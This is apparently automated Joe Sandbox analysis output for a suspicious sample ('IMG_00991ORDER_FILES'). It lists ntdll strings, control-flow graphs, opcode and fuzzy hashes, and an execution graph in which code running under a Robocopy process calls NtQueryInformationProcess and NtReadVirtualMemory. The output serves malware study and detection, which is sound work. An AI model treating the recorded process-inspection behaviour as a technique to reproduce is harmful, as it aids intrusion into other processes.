                                                                                    control_flow_graph 1023 35207550-35207571 1024 35207573-3520758f call 351de580 1023->1024 1025 352075ab-352075b9 call 35214b50 1023->1025 1030 35207595-352075a2 1024->1030 1031 35244443 1024->1031 1032 352075a4 1030->1032 1033 352075ba-352075c9 call 35207738 1030->1033 1035 3524444a-35244450 1031->1035 1032->1025 1039 35207621-3520762a 1033->1039 1040 352075cb-352075e1 call 352076ed 1033->1040 1037 35244456-352444c3 call 3525ef10 call 35218f40 RtlDebugPrintTimes BaseQueryModuleData 1035->1037 1038 352075e7-352075f0 call 35207648 1035->1038 1037->1038 1055 352444c9-352444d1 1037->1055 1038->1039 1050 352075f2 1038->1050 1043 352075f8-35207601 1039->1043 1040->1035 1040->1038 1047 35207603-35207612 call 3520763b 1043->1047 1048 3520762c-3520762e 1043->1048 1054 35207614-35207616 1047->1054 1048->1054 1050->1043 1057 35207630-35207639 1054->1057 1058 35207618-3520761a 1054->1058 1055->1038 1059 352444d7-352444de 1055->1059 1057->1058 1058->1032 1060 3520761c 1058->1060 1059->1038 1061 352444e4-352444ef 1059->1061 1062 352445c9-352445db call 35212b70 1060->1062 1063 352445c4 call 35214c68 1061->1063 1064 352444f5-3524452e call 3525ef10 call 3521a9c0 1061->1064 1062->1032 1063->1062 1072 35244546-35244576 call 3525ef10 1064->1072 1073 35244530-35244541 call 3525ef10 1064->1073 1072->1038 1078 3524457c-3524458a call 3521a690 1072->1078 1073->1039 1081 35244591-352445ae call 3525ef10 call 3524cc1e 1078->1081 1082 3524458c-3524458e 1078->1082 1081->1038 1087 352445b4-352445bd 1081->1087 1082->1081 1087->1078 1088 352445bf 1087->1088 1088->1038
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35244460
                                                                                    • ExecuteOptions, xrefs: 352444AB
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 35244592
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3524454D
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35244530
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 35244507
                                                                                    • Execute=1, xrefs: 3524451E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: e5430d7e579ebf56a88c659e880757a9008ce9cfc10caea7f437e48b3bbc850f
                                                                                    • Instruction ID: db11eab9211e914f6e9b9b70e188578a2d40ef40bf8cace7c8e9639fbc243670
                                                                                    • Opcode Fuzzy Hash: e5430d7e579ebf56a88c659e880757a9008ce9cfc10caea7f437e48b3bbc850f
                                                                                    • Instruction Fuzzy Hash: 7E511671A016597AEF14DF94DC85FEA77B9BF08340F4404E9E90AA7180EBB0DB458E90
                                                                                    Strings
                                                                                    • Actx , xrefs: 35237819, 35237880
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35237807
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 352377E2
                                                                                    • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 352378F3
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 352377DD, 35237802
                                                                                    • SsHd, xrefs: 351EA304
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-1988757188
                                                                                    • Opcode ID: 0d742aa57e7ba79eb53c5984fa879b53a3f55a8a510b1fc1f83266993f08a9be
                                                                                    • Instruction ID: 170b4c3bfb0bad64d6ba3cc6cec47f6e0e6178aacec70528e5b0939182db2f0e
                                                                                    • Opcode Fuzzy Hash: 0d742aa57e7ba79eb53c5984fa879b53a3f55a8a510b1fc1f83266993f08a9be
                                                                                    • Instruction Fuzzy Hash: 0EE1E3B4608B028FE715CE24C898B1AB7E2BF85354F594A2DFC56CB290D771DD85CB81
                                                                                    APIs
                                                                                    Strings
                                                                                    • GsHd, xrefs: 351ED794
                                                                                    • Actx , xrefs: 35239315
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35239178
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35239153
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 3523914E, 35239173
                                                                                    • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35239372
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                    • API String ID: 3446177414-2196497285
                                                                                    • Opcode ID: d26b9e04e29d57c0720c0674b294f5190e2bfb99a7de1e586bc55607ceaac69f
                                                                                    • Instruction ID: c00493ec437a2367b520f037022c7647c0c937cbd745bb2668d3792c0bbd2082
                                                                                    • Opcode Fuzzy Hash: d26b9e04e29d57c0720c0674b294f5190e2bfb99a7de1e586bc55607ceaac69f
                                                                                    • Instruction Fuzzy Hash: A7E1C2B46087428FE710CF25C880F4AB7F5BF89358F414A6DE99A9B281D771E944CB92
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$@$@wCv
                                                                                    • API String ID: 3446177414-2959983557
                                                                                    • Opcode ID: e056e6477b6207ee5e09bb82cab993321fb92b028adce178931737a3f1e838b5
                                                                                    • Instruction ID: 6bf9a63c1f4ed678bd28b36a8cc00b2e0f8e134c48489b9fc7061211758ae5aa
                                                                                    • Opcode Fuzzy Hash: e056e6477b6207ee5e09bb82cab993321fb92b028adce178931737a3f1e838b5
                                                                                    • Instruction Fuzzy Hash: A8811AB2D012699BDB21CF54CC45BEEB7B8AF08750F0041EAE909B7290D7709E85CFA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                    • API String ID: 3446177414-3492000579
                                                                                    • Opcode ID: 6c9a0a70fae852f48a93c024ae8df3140b88b1e7c150a41c6ead2681095cf20a
                                                                                    • Instruction ID: 3d6b8c0486662d119ac536ca4a8c7bce717abcfe9baf3d7748187cd1c10e87b4
                                                                                    • Opcode Fuzzy Hash: 6c9a0a70fae852f48a93c024ae8df3140b88b1e7c150a41c6ead2681095cf20a
                                                                                    • Instruction Fuzzy Hash: 99711375A18645DFCB01CFA8D490AAEFBF2FF49310F44809AE456AB293CB319941CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 35229854, 35229895
                                                                                    • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35229885
                                                                                    • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35229843
                                                                                    • LdrpLoadShimEngine, xrefs: 3522984A, 3522988B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-3589223738
                                                                                    • Opcode ID: e75b3ad3ca5e5d2221d7dbef89e7b4673936a5a32316273011d76417c6532b8e
                                                                                    • Instruction ID: e8808e04ccdcc1e5563a191dfc26371fc0cf5cdd93f2d7073df5854ef9252718
                                                                                    • Opcode Fuzzy Hash: e75b3ad3ca5e5d2221d7dbef89e7b4673936a5a32316273011d76417c6532b8e
                                                                                    • Instruction Fuzzy Hash: 83512175B203549FDB04DBACD898E9DBBB6BF50300F0501A9E552BB296CBB1AC45CBC1
                                                                                    APIs
                                                                                    Strings
                                                                                    • ---------------------------------------, xrefs: 3527EDF9
                                                                                    • HEAP: , xrefs: 3527ECDD
                                                                                    • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3527EDE3
                                                                                    • Entry Heap Size , xrefs: 3527EDED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                    • API String ID: 3446177414-1102453626
                                                                                    • Opcode ID: bf9d1ffcdbc395240cba9fd3774599bde3f56f9799ee93eb38b0aa6c8b10e8e6
                                                                                    • Instruction ID: 4a373bc0da9a1e026f10bc5306e533bbe6e301640ea5a255a651f1ca5b749930
                                                                                    • Opcode Fuzzy Hash: bf9d1ffcdbc395240cba9fd3774599bde3f56f9799ee93eb38b0aa6c8b10e8e6
                                                                                    • Instruction Fuzzy Hash: C341A179610212DFC704CF29D48895ABBBAFF4535472585AAD409AF363CB71ED42CBE0
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpFindDllActivationContext, xrefs: 35243440, 3524346C
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 35243439
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 3524344A, 35243476
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 35243466
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 3446177414-3779518884
                                                                                    • Opcode ID: 2fa3ba2a922b2217745dd70d7f535cecdf96c93717c57a236c0fe2dfce0bf263
                                                                                    • Instruction ID: 68e9bb25ac67c607d3abe9fb258ef7626b33e7317c13698c5bdc6f51bbccf507
                                                                                    • Opcode Fuzzy Hash: 2fa3ba2a922b2217745dd70d7f535cecdf96c93717c57a236c0fe2dfce0bf263
                                                                                    • Instruction Fuzzy Hash: F93129B7A16753AFFB11DB04C888F59B6A5FB003B4F42C166D90967191DBE09D80CED1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 3446177414-3610490719
                                                                                    • Opcode ID: 8233e7875d86b410ed44114c6223c5b82cc0c0943ade49723754bae8c323e06f
                                                                                    • Instruction ID: 8a15fe0d117b5cb7c03ece75df37b7b2cd3a9c454958b04df2dac878b4663f98
                                                                                    • Opcode Fuzzy Hash: 8233e7875d86b410ed44114c6223c5b82cc0c0943ade49723754bae8c323e06f
                                                                                    • Instruction Fuzzy Hash: 99911175308741EFE725CB24C884F2AB7B6BF58A40F010599F8459F286EB75E845CB92
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 3525450F
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 35254519
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 35254508
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 3446177414-3154609507
                                                                                    • Opcode ID: 00aff8ec2c43d072bba68bcdff8c067c12fa8de21bdc01b3fa56df86db6ae64f
                                                                                    • Instruction ID: 9dae84f4fa5bbf69da5398821f95a3b80ba55c838d93318c1ebb6b7c663c22d7
                                                                                    • Opcode Fuzzy Hash: 00aff8ec2c43d072bba68bcdff8c067c12fa8de21bdc01b3fa56df86db6ae64f
                                                                                    • Instruction Fuzzy Hash: D941EE766583128BDB12CF5AD840A56F7E5BF486A0F060E59EC8DA7256EB30ED008BD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd4bbfd4ed64c15831ffabda2b33cabb9a0dc44abe17d3f3b8aa0cf3cd31cafb
                                                                                    • Instruction ID: b5d1d0703d1f617d79a8e5ba4c5f3281ac9a914cdf161ed9257f7d9e80d93b63
                                                                                    • Opcode Fuzzy Hash: cd4bbfd4ed64c15831ffabda2b33cabb9a0dc44abe17d3f3b8aa0cf3cd31cafb
                                                                                    • Instruction Fuzzy Hash: 8FE1F4B5E04708DFDB25CFA9D984A8DBBF6FF48300F10462AE456A7261D7B6A845CF10
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0$0
                                                                                    • API String ID: 3446177414-203156872
                                                                                    • Opcode ID: 9ca94debad629e0faea7fd4789d44723598be29b76fe4f6e66b96535733a8663
                                                                                    • Instruction ID: 576ddb7d948111aaad8c352e5bb2fefb03877eecd0a6f4f1f11004ddfbdf6e7a
                                                                                    • Opcode Fuzzy Hash: 9ca94debad629e0faea7fd4789d44723598be29b76fe4f6e66b96535733a8663
                                                                                    • Instruction Fuzzy Hash: 04418DB56087419FD300CF28C444A5BBBE5BF89354F054A6EF988DB341D776EA06CB86

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:32
                                                                                    Total number of Limit Nodes:3
                                                                                    execution_graph 62577 4a32b20 62579 4a32b2a 62577->62579 62580 4a32b31 62579->62580 62581 4a32b3f LdrInitializeThunk 62579->62581 62584 4d1efda 62585 4d1f00d 62584->62585 62586 4d1f189 NtQueryInformationProcess 62585->62586 62589 4d1f1fc 62585->62589 62587 4d1f1c3 62586->62587 62588 4d1f2a1 NtReadVirtualMemory 62587->62588 62587->62589 62588->62589 62593 4a329f0 LdrInitializeThunk 62600 4a98305 62621 4a32b10 LdrInitializeThunk 62600->62621 62602 4a9834d 62603 4a983df 62602->62603 62622 4a30554 12 API calls 62602->62622 62604 4a983ff 62603->62604 62623 4a32b90 LdrInitializeThunk 62603->62623 62607 4a9840a 62604->62607 62629 4aafe74 LdrInitializeThunk 62604->62629 62609 4a9837b 62620 4a983c4 62609->62620 62624 4aafdce LdrInitializeThunk LdrInitializeThunk 62609->62624 62612 4a9841e 62612->62620 62625 4a32ed0 LdrInitializeThunk 62612->62625 62614 4a98430 62615 4a9844f 62614->62615 62614->62620 62630 4aafe74 LdrInitializeThunk 62614->62630 62626 4a32a80 LdrInitializeThunk 62615->62626 62618 4a98457 62627 4a32da0 LdrInitializeThunk 62618->62627 62620->62603 62628 4a32a80 LdrInitializeThunk 62620->62628 62621->62602 62622->62609 62623->62604 62624->62612 62625->62614 62626->62618 62627->62620 62628->62603 62629->62607 62630->62615

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4d1efda-4d1f00b 1 4d1f029-4d1f048 call 4d21328 call 4d1cfd8 0->1 2 4d1f00d-4d1f024 call 4d21308 0->2 8 4d1f642-4d1f64d 1->8 9 4d1f04e-4d1f15a call 4d1ef18 call 4d21328 call 4d25294 call 4d10398 call 4d208d8 call 4d10398 call 4d208d8 call 4d22ff8 1->9 2->1 26 4d1f160-4d1f1fa call 4d10398 call 4d208d8 NtQueryInformationProcess call 4d21328 call 4d10398 call 4d208d8 9->26 27 4d1f636-4d1f63d call 4d1ef18 9->27 39 4d1f1fc-4d1f209 26->39 40 4d1f20e-4d1f28a call 4d252a2 call 4d10398 call 4d208d8 26->40 27->8 39->27 40->39 49 4d1f290-4d1f29f call 4d252cc 40->49 52 4d1f2a1-4d1f2e2 NtReadVirtualMemory call 4d22018 49->52 53 4d1f2ec-4d1f332 call 4d10398 call 4d208d8 call 4d23958 49->53 56 4d1f2e7 52->56 62 4d1f351-4d1f44d call 4d10398 call 4d208d8 call 4d252da call 4d10398 call 4d208d8 call 4d23318 call 4d212d8 * 3 call 4d252cc 53->62 63 4d1f334-4d1f34c 53->63 56->27 86 4d1f480-4d1f495 call 4d252cc 62->86 87 4d1f44f-4d1f47e call 4d252cc call 4d212d8 call 4d2532e call 4d252e8 62->87 63->27 92 4d1f497-4d1f4b9 call 4d22ac8 86->92 93 4d1f4be-4d1f4d0 call 4d21f58 86->93 99 4d1f4d5-4d1f4df 87->99 92->93 93->99 101 4d1f4e5-4d1f535 call 4d10398 call 4d208d8 call 4d23638 call 4d252cc 99->101 102 4d1f5ad-4d1f616 call 4d10398 call 4d208d8 call 4d23c78 99->102 120 4d1f537-4d1f560 call 4d25378 call 4d2532e 101->120 121 4d1f56a-4d1f571 101->121 102->27 129 4d1f618-4d1f631 call 4d21308 102->129 120->121 123 4d1f573-4d1f57b call 4d252cc 121->123 124 4d1f57d-4d1f588 121->124 123->102 123->124 124->102 126 4d1f58a-4d1f5a8 call 4d23f98 124->126 126->102 129->27
                                                                                    APIs
                                                                                    • NtQueryInformationProcess.NTDLL ref: 04D1F1A8
                                                                                    • NtReadVirtualMemory.NTDLL ref: 04D1F2BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10262446675.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_4d10000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                    • String ID: 0
                                                                                    • API String ID: 1498878907-4108050209
                                                                                    • Opcode ID: 89c8f4b0822c9db942f97866bfe549d97038f90a2278141de3cd7be466b1712c
                                                                                    • Instruction ID: 1ddb9994cd795aa267a264773d5f8fb69bbd8eb93417ff9783f192d0f282f7f3
                                                                                    • Opcode Fuzzy Hash: 89c8f4b0822c9db942f97866bfe549d97038f90a2278141de3cd7be466b1712c
                                                                                    • Instruction Fuzzy Hash: EA123A70618A8C9FDBA5EF28D894AEE77E1FBA5308F40061ED94EC7250DF34A6418B51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4fcb94939e101193b548862fd77b6e0f28467eee4456a8fdfd192617d8aab970
                                                                                    • Instruction ID: 8bb548f605771998beb90c5458cc40fad7de21af3f1d4fc4e828c5e81044c445
                                                                                    • Opcode Fuzzy Hash: 4fcb94939e101193b548862fd77b6e0f28467eee4456a8fdfd192617d8aab970
                                                                                    • Instruction Fuzzy Hash: 4A90023560510402F5007958561470A10058BD0295F61C819A0415568DC7A9D95175A2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 39c9af1f15ff57c22be6d41a825bd8fd7b7e46cfc4ae5cea01c39047b777f928
                                                                                    • Instruction ID: 967e301c7580a7ab7149d462f18078e6a81b0317a846f1a4c68f223c645b1788
                                                                                    • Opcode Fuzzy Hash: 39c9af1f15ff57c22be6d41a825bd8fd7b7e46cfc4ae5cea01c39047b777f928
                                                                                    • Instruction Fuzzy Hash: 089002656011004265407958590440A60059BE1395391C51DA0545560CC62CD855A269
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 59ab2ef01faf0bd8f8fff6ad4bf3180512842252b9a73cf1eaba8c3c30026c2e
                                                                                    • Instruction ID: c852c5fed526db7d63d3195a1062bb1bc069c3b0436681040bd2238deeafd4f0
                                                                                    • Opcode Fuzzy Hash: 59ab2ef01faf0bd8f8fff6ad4bf3180512842252b9a73cf1eaba8c3c30026c2e
                                                                                    • Instruction Fuzzy Hash: AC90023560540012B5407958598454A40059BE0395B51C419E0415554CCA28D9566361

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 150 4a32cf0-4a32cfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.10261663504.00000000049C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049C0000, based on PE: true
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.10261663504.0000000004AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_49c0000_Robocopy.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
